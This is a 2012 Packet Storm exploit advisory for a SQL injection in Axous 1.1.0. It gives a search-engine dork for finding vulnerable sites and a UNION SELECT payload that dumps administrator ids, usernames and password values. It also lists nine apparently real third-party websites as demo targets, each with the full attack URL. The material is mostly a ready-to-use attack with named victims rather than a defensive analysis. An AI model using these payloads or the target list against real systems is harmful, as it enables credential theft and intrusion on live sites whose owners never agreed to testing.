Axous 1.1.0 SQL Injection

2012-04-27T00:00:00
ID PACKETSTORM:112258
Type packetstorm
Reporter Farbod Mahini
Modified 2012-04-27T00:00:00

Description

                                        
                                            `########################################################################################  
# #  
# Exploit Title : Axous 1.1.0 SQL Injection Vulnerabilitiy #  
# #  
# Author : Secure-Land Security Team #  
# #  
# Discovered By : farbodmahini #  
# #  
# Home : Secure-Land.net #  
# #  
# Version : All Version #  
# #  
# Vendor Link : www.axous.com #  
# #  
# Contact : farbodmahini@yahoo.fr , farbodmahini@gmail.com #  
# #  
# Security Risk : High #  
# #  
# DorK : intext:"Powered by Axous 1.1.0" #  
# #  
# #  
########################################################################################  
# Exploit:  
#  
#  
# http://[target]/page.php?id=[SQL]  
#  
# [~] SQL :  
#  
# page.php?id=-1+union+select+1,group_concat(id,0x3a,username,0x3a,password),3+from+fdb_administrators--  
#  
#   
# [~] Demo:  
#  
# fanssofts.com/page.php?id=-1+union+select+1,group_concat%28id,0x3a,username,0x3a,password%29,3+from+fdb_administrators--  
# www.ezprog.com/page.php?id=-1+union+select+1,group_concat%28id,0x3a,username,0x3a,password%29,3+from+fdb_administrators--  
# legendpcsoft.com/page.php?id=-1+union+select+1,group_concat%28id,0x3a,username,0x3a,password%29,3+fro+fdb_administrators--  
# zj-fountain.com/page.php?id=-1+union+select+1,group_concat%28id,0x3a,username,0x3a,password%29,3+from+fdb_administrators--  
# shop.krown-products.net/axous/page.php?id=-1+union+select+1,group_concat%28id,0x3a,username,0x3a,password%29,3+from+fdb_administrators--  
# d-softs.com/axous/page.php?id=-1+union+select+1,group_concat%28id,0x3a,username,0x3a,password%29,3+from+fdb_administrators--  
# multiwan.do-share.com/homepage/page.php?id=-1+union+select+1,group_concat%28id,0x3a,username,0x3a,password%29,3+from+fdb_administrators--  
# seller247.net/page.php?id=-1+union+select+1,group_concat%28id,0x3a,username,0x3a,password%29,3+from+fdb_administrators--  
# lotto-lotterysoftware.com/page.php?id=-1+union+select+1,group_concat%28id,0x3a,username,0x3a,password%29,3+from+fdb_administrators--  
#  
########################################################################################  
# #  
# Special Thanks : 2MzRp-Mikili-M.Prince-0x0ptim0us #  
# #  
########################################################################################  
# #  
# Greetz : All Secure-Land Members - Packetstorm - 1337day - exploit-id #  
# #  
########################################################################################  
`